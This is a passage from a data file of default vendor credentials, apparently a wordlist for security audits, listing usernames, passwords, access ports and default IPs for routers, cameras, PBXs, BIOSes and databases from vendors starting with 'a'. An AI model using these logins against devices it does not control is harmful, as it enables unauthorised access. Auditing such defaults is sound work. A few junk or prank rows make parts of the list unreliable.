Router,,,admin,,,,\naceex,Modem ADSL Router,,HTTP,admin,,Admin,,\nacer,517te,,,,,,,\nacer,AT2617MF LCD TV,,console,,0000,Unlock the TV,,\nacer,AT2617MF LCD TV,,console,,0423,Super Password,Cannot be changed!,\nacer,AT3217MF LCD TV,,console,,0000,Unlock the TV,,\nacer,AT3217MF LCD TV,,console,,0423,Super Password,Cannot be changed!,\nacer,AT3265,,Onscreen Menu,,0000,Unlock the TV,,\nacer,Aspire EasyStore,,,,admin,Admin,,\nacer,BIOS,,,,,,,\nacer,BIOS,,Console,,,Admin,,\nacer,Phoenix,,,,,,,\nacer,Veriton 5900,,,,admin,Acer-000000,,\nacer,Veriton 5900,,,,admin,Admin,,\nacer,WLANGRU2,,,admin,password,Admin,,\nacer,acer,,,acer,acer,,,\nacer,eRecovery,,,,000000,Admin,,\nacorp,all routers,,http,Admin,Admin,,,\nacti,Most Camera Models,,192.168.0.100,admin,123456 or 12345,administrative,,\nactiontec,,,192.168.1.1,admin,password1,Admin,This the password commonly set by VZ Techs.,\nactiontec,802AA,,192.168.0.250,Admin,,Admin,SSID is ACTIONTEC_11A,\nactiontec,AU802C,,192.168.1.240,Admin,Admin,Admin,,\nactiontec,F2250,,192.168.254.254,,,Admin,,\nactiontec,GE344000-01 Router,,,,,,,\nactiontec,GT701,,http://192.168.0.1,admin,,,,\nactiontec,GT701-GW,,Multi,admin,admin,,,\nactiontec,GT701-WG,,192.168.1.1,admin,password,,,\nactiontec,GT701-WG,,HTTP,admin,password,192.168.1.1,,\nactiontec,GT701GW,,Multi,admin,admin,,,\nactiontec,GT701WG,,192.168.0.1,,,Admin,,\nactiontec,GT701WG,,HTTP,admin,password,192.168.1.1,,\nactiontec,GT704,,192.168.0.1,admin,,Admin,,\nactiontec,GT704WG,,192.168.1.1,admin,password,Admin,,\nactiontec,GT704WGRV,,192.168.0.1,,,Admin,,\nactiontec,GT724WG,,192.168.0.1,,,Admin,,\nactiontec,GT784WN,,192.168.0.1,,,Admin,,\nactiontec,M1000 modem,,192.168.0.1,,,Admin,SSID is like myqwestXXXX,\nactiontec,M1424WR,,,admin,password,,,\nactiontec,MI424WR modem,,192.168.1.1,,,Admin,,\nactiontec,PK5000 modem,,192.168.0.1,,,Admin,SSID is like myqwestXXXX,\nactiontec,R1520SU,,,admin,,Admin,,\nactiontec,R1524 modem,,192.168.0.1,,,Admin,SSID is ACTIONTEC,\nactiontec,R3000 router,,192.168.0.1,,,Admin,SSID is ACTIONTEC,\nactiontec,R3010UW router,,192.168.0.1,,,Admin,SSID is ACTIONTEC,\nactiontec,R3010UW(AP),,192.168.0.1,,,Admin,SSID is ACTIONTEC,\nactiontec,V1000H,Telus,http://192.168.1.254,admin,telus,,,\nactiontec,W1424WR FiOS router,,,admin,password,Admin,Verizon,\nactiontec,gt701,,http://192.168.0.1,admin,,,,\nactiontec,gt701-gw,,,admin,admin,,,\nadaptec,AWN-8060,AP,,admin,,Admin,SSID is Adaptec,\nadaptec,AWN-8084,router,192.168.8.1,admin,,Admin,SSID is Adaptec,\nadaptec,RAID Controller,,,Administrator,adaptec,,,\nadaptec,Storage Manager Pro,,,Administrator,adaptec,,All,\nadaptecraid,Storage Manager Pro,,,Administrator,adaptec,,All,\nadb,DV2211 modem,,192.168.1.1,admin,admin,Admin,,\nadb,P.DG A2100N modem,,192.168.1.1,admin,password,Admin,,\nadc kentrox,Pacesetter Router,,,,secret,,,\nadckentrox,Pacesetter Router,,Telnet,,secret,,,\nadcompletecom,Ban Man Pro,,,Admin1,Admin1,,,\naddtron,ADR-E200P,router,192.168.1.1,root,,Admin,SSID is WLAN,\naddtron,AWS-100,AP,,default,WLAN_AP,Admin,SSID is WLAN,\nadic,24,,HTTP,admin,password,,,\nadic,Scalar 100/1000,,HTTP,admin,secure,Admin,,\nadic,Scalar i2000,,Multi,admin,password,Admin,,\nadobe,CQ,,,admin,admin,,,\nadobe,CQ,,,author,author,,,\nadobe,Experience Manager,,,admin,admin,,,\nadobe,Experience Manager\\CQ,,,anonymous,anonymous,,,\nadobe,Experience Manager\\CQ,,,aparker@geometrixx.info,aparker,,,\nadobe,Experience Manager\\CQ,,,jdoe@geometrixx.info,jdoe,,,\nadobe,Experience Manager\\CQ,,,replication-receiver,replication-receiver,,,\nadobe,Vignette Connector,,,vgnadmin,vgnadmin,,,\nadp,ADP Payroll Database,,,sys,adpadmin,,,\nadp,ADP Payroll HR database,,Admin,sysadmin,master,,,\nadp,ADP Payroll HR database,,All,sysadmin,master,,,\nadp,ADP Payroll HR database,All,Multi,sysadmin,master,Admin,,\nadt,Safewatch Pro3000,,,,2580,,,\nadtech,AX4000,,,root,ax400,,,\nadtech,AX4000,,,root,ax400,Admin,,\nadtran,Agent Card,,,,ADTRAN,,,\nadtran,Agent Card,,Telnet,,ADTRAN,Admin,ctrl-PTT,\nadtran,Atlas 800/800Plus/810Plus/550,,,,Password,,,\nadtran,Atlas 800/800Plus/810Plus/550,,Telnet,,Password,Admin,crtl-L,\nadtran,Express 5110/5200/5210,,,,adtran,,,\nadtran,Express 5110/5200/5210,,Telnet,,adtran,Admin,hit enter a few times,\nadtran,MX2800,,,,adtran,,,\nadtran,MX2800,,Telnet,,adtran,Admin,hit enter a few times,\nadtran,NetVanta 7100,,,admin,password,,,\nadtran,NetVanta 7100,,Multi,admin,password,,,\nadtran,NetVanta,,,admin,password,,,\nadtran,NxIQ,,,,adtran,,,\nadtran,NxIQ,,Telnet,,adtran,Admin,hit enter a few times,\nadtran,Smart 16/16e,,,,PASSWORD,,,\nadtran,Smart 16/16e,,Telnet,,,Admin,hit enter a few times,\nadtran,Smart 16/16e,,Telnet,,PASSWORD,Admin,hit enter a few times,\nadtran,T3SU 300,,,,adtran,,,\nadtran,T3SU 300,,Telnet,,adtran,Admin,Hit enter a few times,\nadtran,TSU IQ/DSU IQ,,,,,,,\nadtran,TSU IQ/DSU IQ,,Telnet,,,Admin,hit enter a few times,\nadtran,TSU Router Module/L128/L768/1.5,,,,,,,\nadtran,TSU Router Module/L128/L768/1.5,,Telnet,,,Admin,hit enter a few times,\nadvanced integration,PC BIOS,,,,Advance,,,\nadvanced integration,PC BIOS,,Admin,,Advance,,,\nadvancedintegration,PC BIOS,,Console,,Advance,Admin,,\nadvanteknetworks,Wireless LAN 802.11 g/b,,Multi,admin,,Admin,,\naerohive,HiveAP 350,AP,,admin,aerohive,Admin,SSID is like AH-XXXXXX_ac,\naethra,Starbridge EU,,HTTP,admin,password,Admin,,\nagasio,A502W,Camera,DHCP,admin,,Admin,,\nagasio,A502W-B,Camera,DHCP,admin,,Admin,,\nagasio,A503W,Camera,DHCP,admin,,Admin,,\nagasio,A503W-B,Camera,DHCP,admin,,Admin,,\nagasio,A503W-W,Camera,DHCP,admin,,Admin,,\nagere,AP-2000,AP,10.0.0.1,,public,Admin,,\nagere,ORiNOCO AP-200,AP,169.254.0.2,admin,,Admin,,\nairaya,Corp AIRAYA WirelessGRID,,,Airaya,Airaya,,,\nairlink plus,RTW026,,V0.80.0010 (firmware),,admin,,,\nairlink101,AP311W,repeater,192.168.1.250,admin,admin,Admin,,\nairlink101,AP411W,AP,10.0.0.1,admin,admin,Admin,,\nairlink101,AP671W,AP,192.168.2.250,admin,password,Admin,,\nairlink101,AR315W,router,192.168.1.1,admin,admin,Admin,,\nairlink101,AR325W,router,192.168.1.1,,admin,Admin,,\nairlink101,AR550W3G,hotspot,192.168.2.1,,,Admin,,\nairlink101,AR570W,V2,192.168.2.1,,admin,Admin,,\nairlink101,AR570W,router,192.168.2.1,admin,admin,Admin,,\nairlink101,SkyIPCam AICN1500W,v2,DHCP,admin,admin,Admin,,\nairlink101,SkyIPCam AICN1620PoE,wired camera,DHCP,admin,admin,Admin,,\nairlink101,SkyIPCam AICN1620W,camera,DHCP,admin,admin,Admin,,\nairlink101,SkyIPCam AICN1747W,camera,DHCP,admin,admin,Admin,,\nairlink101,SkyIPCam AICN1777W,camera,DHCP,admin,admin,Admin,,\nairlink101,SkyIPCam AICN500,night vision camera,DHCP,admin,admin,Admin,,\nairnet,AWR014G8,router,192.168.1.1,admin,admin,Admin,,\naironet,(All),,,,,,,\naironet,all products,all vers,,,,,,\nairtightnetworks,C-75,AP,192.168.1.245,,,Admin,,\nairtightnetworks,C-75-E,AP,192.168.1.245,,,Admin,,\nairvast,WA-1300,AP,192.168.1.90,,,Admin,,\nairvast,WR-2000,AP,192.168.62.1,admin,1234,Admin,,\nairway,Transport,,,,0,admin,,\nairway,Transport,,,,0000,admin,,\naladdin,eSafe Appliance,,,root,kn1TG7psLu,,,\naladdin,eSafe Appliance,,Console/SSH,root,kn1TG7psLu,root,,\nalaxala,AX780R,router,,operator,,Admin,,\nalcatel thomson,SpeedTouch580,,,admin,admin,,,\nalcatel,4400,,Console,mtcl,,User,,\nalcatel,4400,,Superuser,superuser,superuser,,,\nalcatel,4400,PBX,Port 2533,adfexc,adfexc,,,\nalcatel,4400,PBX,Port 2533,at4400,at4400,,,\nalcatel,4400,PBX,Port 2533,client,client,,,\nalcatel,4400,PBX,Port 2533,dhs3mt,dhs3mt,,,\nalcatel,4400,PBX,Port 2533,dhs3pms,dhs3pms,,,\nalcatel,4400,PBX,Port 2533,halt,tlah,shutdown,,\nalcatel,4400,PBX,Port 2533,install,llatsni,,,\nalcatel,4400,PBX,Port 2533,kermit,kermit,,,\nalcatel,4400,PBX,Port 2533,mtch,mtch,,,\nalcatel,4400,PBX,Port 2533,mtcl,mtcl,,,\nalcatel,4400,PBX,Port 2533,root,letacla,,,\nalcatel,6224-24p,,console,admin,switch,,,\nalcatel,OS6850-24p,,console,admin,switch,,,\nalcatel,OXO,1.3,Multi,,admin,User,,\nalcatel,OXO,7,,installer,pbxk1064,,,\nalcatel,Office 4200,,,,1064,,,\nalcatel,Office 4200,,Admin,,1064,,,\nalcatel,Office 4200,,Multi,,1064,Admin,,\nalcatel,OmniPCX Office,,Admin,ftp_admi,kilo1987,,,\nalcatel,OmniPCX Office,,Installer,ftp_inst,pbxk1064,,,\nalcatel,OmniPCX Office,,NMC,ftp_nmc,tuxalize,,,\nalcatel,OmniPCX Office,,Operator,ftp_oper,help1954,,,\nalcatel,OmniPCX Office,4.1,FTP,ftp_admi,kilo1987,,,\nalcatel,OmniPCX Office,4.1,FTP,ftp_admi,kilo1987,Admin,,\nalcatel,OmniPCX Office,4.1,FTP,ftp_inst,pbxk1064,Installer,,\nalcatel,OmniPCX Office,4.1,FTP,ftp_nmc,tuxalize,NMC,,\nalcatel,OmniPCX Office,4.1,FTP,ftp_oper,help1954,Operator,,\nalcatel,OmniPCX Office,4.1,Multi,ftp_admi,kilo1987,Admin,,\nalcatel,OmniPCX Office,4.1,Other,ftp_inst,pbxk1064,Installer,,\nalcatel,OmniPCX Office,4.1,Other,ftp_nmc,tuxalize,NMC,,\nalcatel,OmniPCX Office,4.1,Other,ftp_oper,help1954,Operator,,\nalcatel,OmniPCX,4.1 and above,Voicemail (User),,1515,,,\nalcatel,OmniStack 6024,,,admin,switch,,,\nalcatel,OmniStack 6024,,Admin,admin,switch,,,\nalcatel,OmniStack 6024,,Telnet,admin,switch,Admin,,\nalcatel,OmniStack/OmniSwitch,,Telnet,diag,switch,Admin,,\nalcatel,OmniStack/OmniSwitch,,Telnet/Console,diag,switch,Admin,,\nalcatel,Omnistack/Omniswitch,,,diag,switch,,,\nalcatel,PBX,,4400,adfexc,adfexc,,,\nalcatel,PBX,,4400,at4400,at4400,,,\nalcatel,PBX,,4400,client,client,,,\nalcatel,PBX,,4400,dhs3mt,dhs3mt,,,\nalcatel,PBX,,4400,dhs3pms,dhs3pms,,,\nalcatel,PBX,,4400,halt,tlah,,,\nalcatel,PBX,,4400,install,llatsni,,,\nalcatel,PBX,,4400,kermit,kermit,,,\nalcatel,PBX,,4400,mtch,mtch,,,\nalcatel,PBX,,4400,mtcl,mtcl,,,\nalcatel,PBX,,4400,root,letacla,,,\nalcatel,PBX,,unknown,adfexc,adfexc,,,\nalcatel,PBX,,unknown,at4400,at4400,,,\nalcatel,PBX,,unknown,client,client,,,\nalcatel,PBX,,unknown,dhs3mt,dhs3mt,,,\nalcatel,PBX,,unknown,dhs3pms,dhs3pms,,,\nalcatel,PBX,,unknown,halt,tlah,,,\nalcatel,PBX,,unknown,install,llatsni,,,\nalcatel,PBX,,unknown,kermit,kermit,,,\nalcatel,PBX,,unknown,mtch,mtch,,,\nalcatel,PBX,,unknown,mtcl,mtcl,,,\nalcatel,PBX,,unknown,root,letacla,,,\nalcatel,PBX,4400,Port 2533,adfexc,adfexc,unknown,,\nalcatel,PBX,4400,Port 2533,at4400,at4400,unknown,,\nalcatel,PBX,4400,Port 2533,client,client,unknown,,\nalcatel,PBX,4400,Port 2533,dhs3mt,dhs3mt,unknown,,\nalcatel,PBX,4400,Port 2533,dhs3pms,dhs3pms,unknown,,\nalcatel,PBX,4400,Port 2533,halt,tlah,shutdown,,\nalcatel,PBX,4400,Port 2533,install,llatsni,unknown,,\nalcatel,PBX,4400,Port 2533,kermit,kermit,unknown,,\nalcatel,PBX,4400,Port 2533,mtch,mtch,unknown,,\nalcatel,PBX,4400,Port 2533,mtcl,mtcl,unknown,,\nalcatel,PBX,4400,Port 2533,root,letacla,unknown,,\nalcatel,ST2030,All,10.1.24.88,administrator,784518,Admin,,\nalcatel,SpeedTouch 510,,192.168.1.254/24,,,,Default IP 192.168.1.254/24,\nalcatel,SpeedTouch 510,,HTTP/Telnet,,,,Default IP 192.168.1.254/24,\nalcatel,SpeedTouch 530,All,10.0.0.138,,,Admin,,\nalcatel,SpeedTouch 536,Bigpond firmware,192.168.1.254 or 10.0.0.138,admin,admin,Admin,Bigpond-issued devices,\nalcatel,SpeedTouch 536,Most,192.168.1.254,Administrator,,Admin,,\nalcatel,SpeedTouch 536,v6 Telstra firmware,192.168.1.254 or 10.0.0.138,admin,admin,Admin,Telstra-issued devices,\nalcatel,SpeedTouch 536,v6,192.168.1.254,Administrator,,Admin,,\nalcatel,SpeedTouch 546,Most,192.168.1.254,Administrator,,Admin,,\nalcatel,SpeedTouch 546,v6,192.168.1.254,Administrator,,Admin,,\nalcatel,SpeedTouch 570,All,10.0.0.138,,,Admin,,\nalcatel,SpeedTouch 580,4.3.19,HTTP,admin,admin,,,\nalcatel,SpeedTouch 580,Most,192.168.1.254,Administrator,,2012-01-08,,\nalcatel,SpeedTouch 585,Most,192.168.1.254,Administrator,,Admin,,\nalcatel,SpeedTouch 585,v6,192.168.1.254,Administrator,,Admin,,\nalcatel,SpeedTouch Home,All,10.0.0.138,(no default),(no default),Admin,,\nalcatel,SpeedTouch Pro,4-Port FW,10.0.0.138,,,Admin,,\nalcatel,SpeedTouch Pro,4-Port,10.0.0.138,,,Admin,,\nalcatel,SpeedTouch Pro,All,10.0.0.138,admin,admin,Admin,,\nalcatel,Speedtouch 585,V6,,Admin,23698,,,\nalcatel,Speedtouch,,500 series,,,,,\nalcatel,TG585,v7,192.168.1.254,Administrator,,Admin,,\nalcatel,TG782T,All,10.0.0.138 or 192.168.1.254 or bigpond.bigpond,admin,,Admin,Modem locked to Bigpond or Telstra,\nalcatel,Technicolor TG587n,v3,admin,admin,Admin,2012-01-08,,\nalcatel,Timestep VPN 1520,3.00.026,Permit config and console,root,permit,Admin,Perm/Config port 38036,\nalcatel,Timestep VPN Gateway 15xx/45xx/7xxx,,,root,permit,,Any,\nalcatel,iptouch,all,phone,,0000,push i key,,\nalcatellucent,CellPipe 7130 RG,5Ae.A2010,192.168.1.1,admin,admin,Admin,,\nalcatellucent,RG200E-CA,router,192.168.1.1,,,Admin,SSID is like ChinaNet-XXXX,\nalfanetwork,AIP-W411,router,192.168.2.1,admin,admin,Admin,,\nalfanetwork,AIP-W505,router,192.168.2.1,admin,admin,Admin,,\nalfanetwork,AIP-W610H,router,192.168.2.1,admin,admin,Admin,,\nalfanetwork,AP51,AP,10.0.0.1,admin,admin,Admin,,\nalfanetwork,R36,router,192.168.2.1,admin,admin,Admin,,\nalice,IAD WLAN 4421,modem,192.168.1.1,,,Admin,SSID is like ALICE-WLANXX,\nalientechnology,ALR-9900,,,root,alien.,,,\nallan,ass,,tool,tool,face,,,\nallied telesyn,8326G,,,,,,,\nallied telesyn,AT-8024(GB),,,,admin,,,\nallied telesyn,AT-8024(GB),,,manager,admin,,,\nallied telesyn,AT-8024(GB),,any,,admin,,,\nallied telesyn,All,,Admin,manager,friend,,,\nallied telesyn,All,,All,manager,friend,,,\nallied telesyn,Generic Switch/Router,,,manager,friend,,,\nallied telesyn,Generic Switch/Router,,Admin,manager,friend,,,\nallied telesyn,Rapier G6 Switch,,,,manager,,,\nallied telesyn,Switch,,AT-8124XL 1.0.3,admin,,,,\nallied telesyn,Switch,,Admin,admin,,,,\nallied,CJ8MO E-U,,,,,,,\nallied,CJ8MO E-U,,Admin,,,,,\nallied,CJ8MO E-U,,Telnet,,,Admin,,\nallied,Telesyn,,,manager,friend,,,\nallied,Telesyn,,,secoff,secoff,,,\nallied,Telesyn,,Admin,manager,friend,,,\nallied,Telesyn,,Admin,secoff,secoff,,,\nallied-telesyn,AT-8550GB,,,manager,friend,,,\nallied-telesyn,AT-RG613LH,,,manager,friend,,,\nallieddata,CopperJet 1610,6.1,172.19.3.1(ethernet) 172.20.3.1(usb),admin,admin,Admin,,\nallieddata,CopperJet 1612,6.1,172.19.3.1(ethernet) 172.20.3.1(usb),admin,admin,Admin,,\nallieddata,CopperJet 1614,6.1,172.19.3.1(ethernet) 172.20.3.1(usb),admin,admin,Admin,,\nallieddata,CopperJet 1616,6.1,172.19.3.1(ethernet) 172.20.3.1(usb),admin,admin,Admin,,\nallieddata,CopperJet 1620,6.1,172.19.3.1(ethernet) 172.20.3.1(usb),admin,admin,Admin,,\nallieddata,CopperJet 1622,6.1,172.19.3.1(ethernet) 172.20.3.1(usb),admin,admin,Admin,,\nallieddata,CopperJet 1624,6.1,172.19.3.1(ethernet) 172.20.3.1(usb),admin,admin,Admin,,\nallieddata,CopperJet 1626,6.1,172.19.3.1(ethernet) 172.20.3.1(usb),admin,admin,Admin,,\nallieddata,CopperJet 408,5.16,172.19.3.1,admin,admin,Admin,,\nallieddata,CopperJet 409,5.16,172.19.3.1,admin,admin,Admin,,\nallieddata,CopperJet 412,5.16,172.19.3.1,admin,admin,Admin,,\nallieddata,CopperJet 416,1.1,172.19.3.1(ethernet) or 172.20.3.1(usb),admin,admin,Admin,,\nallieddata,CopperJet 417,1.1,172.19.3.1(ethernet) or 172.20.3.1(usb),admin,admin,Admin,,\nallieddata,CopperJet 422,5.16,172.19.3.1,admin,admin,Admin,,\nallieddata,CopperJet 426,1.1,172.19.3.1(ethernet) or 172.20.3.1(usb),admin,admin,Admin,,\nallieddata,CopperJet 427,1.1,172.19.3.1(ethernet) or 172.20.3.1(usb),admin,admin,Admin,,\nallieddata,CopperJet 810,5.15,172.19.3.1(ethernet) or 172.20.3.1(usb),admin,admin,Admin,,\nallieddata,CopperJet 811,5.15,172.19.3.1(ethernet) or 172.20.3.1(usb),admin,admin,Admin,,\nallieddata,CopperJet 812,5.15,172.19.3.1(ethernet) or 172.20.3.1(usb),admin,admin,Admin,,\nallieddata,CopperJet 813,5.15,172.19.3.1(ethernet) or 172.20.3.1(usb),admin,admin,Admin,,\nallieddata,CopperJet 814,5.15,172.19.3.1(ethernet) or 172.20.3.1(usb),admin,admin,Admin,,\nallieddata,CopperJet 815,5.15,172.19.3.1(ethernet) or 172.20.3.1(usb),admin,admin,Admin,,\nallieddata,CopperJet 816,5.15,172.19.3.1(ethernet) or 172.20.3.1(usb),admin,admin,Admin,,\nallieddata,CopperJet 816_2P,5.15,172.19.3.1(ethernet) or 172.20.3.1(usb),admin,admin,Admin,,\nallieddata,CopperJet 817,5.15,172.19.3.1(ethernet) or 172.20.3.1(usb),admin,admin,Admin,,\nallieddata,CopperJet 820,5.15,172.19.3.1(ethernet) or 172.20.3.1(usb),admin,admin,Admin,,\nallieddata,CopperJet 821,5.15,172.19.3.1(ethernet) or 172.20.3.1(usb),admin,admin,Admin,,\nallieddata,CopperJet 822,5.15,172.19.3.1(ethernet) or 172.20.3.1(usb),admin,admin,Admin,,\nallieddata,CopperJet 823,5.15,172.19.3.1(ethernet) or 172.20.3.1(usb),admin,admin,Admin,,\nallieddata,CopperJet 824,5.15,172.19.3.1(ethernet) or 172.20.3.1(usb),admin,admin,Admin,,\nallieddata,CopperJet 825,5.15,172.19.3.1(ethernet) or 172.20.3.1(usb),admin,admin,Admin,,\nallieddata,CopperJet 826,5.15,172.19.3.1(ethernet) or 172.20.3.1(usb),admin,admin,Admin,,\nallieddata,CopperJet 827,5.15,172.19.3.1(ethernet) or 172.20.3.1(usb),admin,admin,Admin,,\nallieddata,CopperJet 828,5.15,172.19.3.1(ethernet) or 172.20.3.1(usb),admin,admin,Admin,,\nallieddata,CopperJet 829,5.15,172.19.3.1(ethernet) or 172.20.3.1(usb),admin,admin,Admin,,\nallieddata,Tornado 110,All,192.168.123.254,,admin,Admin,,\nallieddata,Tornado 140,All,192.168.123.254,,admin,Admin,,\nallieddata,Tornado 2440,All,192.168.1.1,admin,admin,Admin,,\nallieddata,Tornado 2440,All,192.168.1.1,user,user,Display device status,,\nallieddata,Tornado 2441,All,192.168.1.1,admin,admin,Admin,,\nallieddata,Tornado 2441,All,192.168.1.1,user,user,Display device status,,\nallieddata,Tornado 810,5.15,172.19.3.1(ethernet) or 172.20.3.1(usb),admin,admin,Admin,,\nallieddata,Tornado 820,5.15,172.19.3.1(ethernet) or 172.20.3.1(usb),admin,admin,Admin,,\nallieddata,Tornado 822,5.15,172.19.3.1(ethernet) or 172.20.3.1(usb),admin,admin,Admin,,\nallieddata,Tornado 830,All,192.168.123.254,,admin,Admin,,\nallieddata,Tornado 831,All,192.168.123.254,,admin,Admin,,\nallieddata,Tornado 840,All,192.168.123.254,,admin,Admin,,\nallieddata,Tornado 841,All,192.168.123.254,,admin,Admin,,\nalliedtelesyn,ALAT8326GB,,Multi,manager,manager,Admin,,\nalliedtelesyn,AT Router,,HTTP,root,,Admin,,\nalliedtelesyn,AT-8024(GB),,Console,,admin,Admin,,\nalliedtelesyn,AT-8024(GB),,HTTP,manager,admin,Admin,,\nalliedtelesyn,AT-8550GB,,Telnet,manager,friend,,,\nalliedtelesyn,AT-AR130 (U) -10,,HTTP,Manager,friend,Admin,Default IP is 192.168.242.242,\nalliedtelesyn,AT-AR750S,,,manager,friend,,,\nalliedtelesyn,AT-RG613LH,2-3_59,Telnet,manager,friend,,,\nalliedtelesyn,AT8000S/24,v1.1.0.32,serial console,manager,friend,admin,,\nalliedtelesyn,AT8016F,,Console,manager,friend,Admin,,\nalliedtelesyn,All Routers,,,Manager,Friend,,Any,\nalliedtelesyn,All,All,Telnet,manager,friend,Admin,,\nalliedtelesyn,Allied Telesyn,AR410,,Administrator,admin,,,\nalliedtelesyn,Generic Switch/Router,,Multi,manager,friend,Admin,,\nalliedtelesyn,R130,,,Manager,friend,,,\nalliedtelesyn,Rapier G6 Switch,,,manager,friend,,,\nalliedtelesyn,Switch,AT-8124XL 1.0.3,Multi,admin,,Admin,,\nalliedtelesyn,Various,,Multi,manager,friend,Admin,,\nalliedtelesyn,Various,,Multi,secoff,secoff,Admin,,\nalliedtelesyn,at-img634w,a+,multi,manager,friend,,,\nalliedtelesyn,windows xp, AR410,http://192.168.1.174,admin,admin,user,HACK,\nalliedtelesyn,windows xp,AR410,http://192.168.1.174,admin,admin,user,HACK,\nallnet,ALL0275 802.11g AP,,1.0.6,,admin,,,\nallnet,ALL0275 802.11g AP,1.0.6,HTTP,,admin,Admin,,\nallnet,ALL0305,,192.168.1.1,root,admin,Admin,,\nallnet,ALL129DSL,,,admin,admin,,,\nallnet,ALL129DSL,,,admin,admin,Administrator,Likely the default on all routers,\nallnet,T-DSL Modem,,Software Version: v1.51,admin,admin,,,\nallnet,T-DSL Modem,Software Version: v1.51 ,HTTP,admin,admin,Admin,,\nallnet,T-DSL Modem,Software Version: v1.51,HTTP,admin,admin,Admin,,\nallot,Netenforcer,,,admin,allot,,,\nallot,Netenforcer,,,admin,allot,Admin,,\nallot,Netenforcer,,,root,bagabu,,,\nallot,Netenforcer,,,root,bagabu,Admin,,\nalpha,3100-4G,,192.168.1.1,,,Admin,,\nalpha,AFW-GR50,,192.168.1.1,admin,admin,Admin,SSID is 'Default',\nalteon,ACEDirector3,,,admin,,,,\nalteon,ACEDirector3,,console,admin,,,,\nalteon,ACEswitch 180e (telnet),,,admin,blank,,,\nalteon,ACEswitch,,,admin,,,,\nalteon,ACEswitch,,180e,admin,,,,\nalteon,ACEswitch,,Admin,admin,admin,,,\nalteon,ACEswitch,,Admin,admin,linga,,,\nalteon,ACEswitch,180e,HTTP,admin,admin,Admin,,\nalteon,ACEswitch,180e,HTTP,admin,linga,Admin,,\nalteon,AD4,9,Console,admin,admin,Admin,Factory default,\nalteon,All hardware releases,,,,admin,,Web OS 5.2,\nalvarion,TE1088,All,192.168.1.1,(no username),installer,Admin,,\nalvarion,TE1088,All,192.168.1.1,(no username),public,User,,\nalvarion,WIXFBR-103X187,,,admin,admin,Admin,,\nambicom,WL1100B-AR,,192.168.1.1,,default,Admin,,\nambicom,WL151N-AR,,192.168.0.1,admin,admin,Admin,,\nambit,,,,admin,cableroot,root,,\nambit,ADSL,,,root,,,,\nambit,ADSL,,Admin,root,,,,\nambit,ADSL,,Telnet,root,,Admin,,\nambit,Cable Modem 60678eu,,1.12,root,root,,,\nambit,Cable Modem 60678eu,1.12,Multi,root,root,Admin,,\nambit,Cable Modem,,,root,root,,,\nambit,Cable Modem,,Multi,root,root,Admin,Time Warner Cable issued modem,\nambit,Cable Modem,,Multi,user,user,,,\nambit,DOCSIS 1.0/1.1/2.0 Compliant,5.66.1011,,user,,user,,\nambit,ntl:home 200,2.67.1011,HTTP,root,root,Admin,This is the cable modem supplied by NTL in the UK,\nami bios,1999,,AT 49,,,,,\nami,PC BIOS,,,,AMI.KEY,,,\nami,PC BIOS,,,,AMISETUP,,,\nami,PC BIOS,,Admin,,A.M.I,,,\nami,PC BIOS,,Admin,,AM,,,\nami,PC BIOS,,Admin,,AMI!SW,,,\nami,PC BIOS,,Admin,,AMI,,,\nami,PC BIOS,,Admin,,AMI.KEY,,,\nami,PC BIOS,,Admin,,AMI.KEZ,,,\nami,PC BIOS,,Admin,,AMI?SW,,,\nami,PC BIOS,,Admin,,AMIAMI,,,\nami,PC BIOS,,Admin,,AMIDECOD,,,\nami,PC BIOS,,Admin,,AMIPSWD,,,\nami,PC BIOS,,Admin,,AMISETUP,,,\nami,PC BIOS,,Admin,,AMI_SW,,,\nami,PC BIOS,,Admin,,AMI~,,,\nami,PC BIOS,,Admin,,BIOSPASS,,,\nami,PC BIOS,,Admin,,HEWITT RAND,,,\nami,PC BIOS,,Admin,,aammii,,,\nami,PC BIOS,,Console,,A.M.I,Admin,,\nami,PC BIOS,,Console,,AAAMMMIII,Admin,,\nami,PC BIOS,,Console,,AM,Admin,,\nami,PC BIOS,,Console,,AMI!SW,Admin,,\nami,PC BIOS,,Console,,AMI,Admin,,\nami,PC BIOS,,Console,,AMI.KEY,Admin,,\nami,PC BIOS,,Console,,AMI.KEZ,Admin,,\nami,PC BIOS,,Console,,AMI?SW,Admin,,\nami,PC BIOS,,Console,,AMIAMI,Admin,,\nami,PC BIOS,,Console,,AMIDECOD,Admin,,\nami,PC BIOS,,Console,,AMIPSWD,Admin,,\nami,PC BIOS,,Console,,AMISETUP,Admin,,\nami,PC BIOS,,Console,,AMI_SW,Admin,,\nami,PC BIOS,,Console,,AMI~,Admin,,\nami,PC BIOS,,Console,,BIOS,Admin,,\nami,PC BIOS,,Console,,BIOSPASS,Admin,,\nami,PC BIOS,,Console,,CMOSPWD,Admin,,\nami,PC BIOS,,Console,,CONDO,Admin,,\nami,PC BIOS,,Console,,HEWITT RAND,Admin,,\nami,PC BIOS,,Console,,LKWPETER,Admin,,\nami,PC BIOS,,Console,,MI,Admin,,\nami,PC BIOS,,Console,,Oder,Admin,,\nami,PC BIOS,,Console,,PASSWORD,Admin,,\nami,PC BIOS,,Console,,aammii,Admin,,\nami,at 49,,,,,,,\namigo,ADSL Router,,,admin,epicrouter,,,\namigo,BRB72n,router,192.168.1.1,admin,admin,Admin,,\namigo,BRC70n,router,192.168.1.1,admin,admin,Admin,,\namigo,BRC76n,router,192.168.1.1,admin,admin,Admin,,\namigo,BRD70n,router,192.168.1.1,admin,admin,Admin,,\namigo,BRE70n,router,192.168.1.1,admin,admin,Admin,,\namigo,BRF70n,router,192.168.1.1,admin,admin,Admin,,\namino,AmiNET Set Top Box,,,,leaves,,,\namino,AmiNET Set Top Box,,,,snake,,,\namit,BDW463AM,router,192.168.123.254,admin,admin,Admin,,\namit,CDD531AM U02,modem,192.168.123.254,admin,admin,Admin,,\namit,CDE530AM,router,192.168.123.254,admin,admin,Admin,,\namit,CDE570AM,router,192.168.123.254,admin,admin,Admin,,\namit,CDM530AM,router,192.168.123.254,,admin,Admin,,\namit,CDM531AM,hotspot,192.168.123.254,,admin,Admin,,\namit,CDM532AM-001,router,192.168.123.254,,admin,Admin,,\namit,CDW531AM,router,192.168.123.254,,admin,Admin,,\namit,CDW68AAM-U01,router,192.168.123.254,,admin,Admin,,\namit,WIMQ137AM,router,192.168.123.254,,admin,Admin,,\namit,WIP-301,router,192.168.123.254,,admin,Admin,,\namit,WIP181AM,router,192.168.123.254,,admin,Admin,,\namitech,wireless router and access point 802.11g 802.11b,any,HTTP,admin,admin,Admin,Web interface is on 192.168.1.254 available on the LAN ports of the 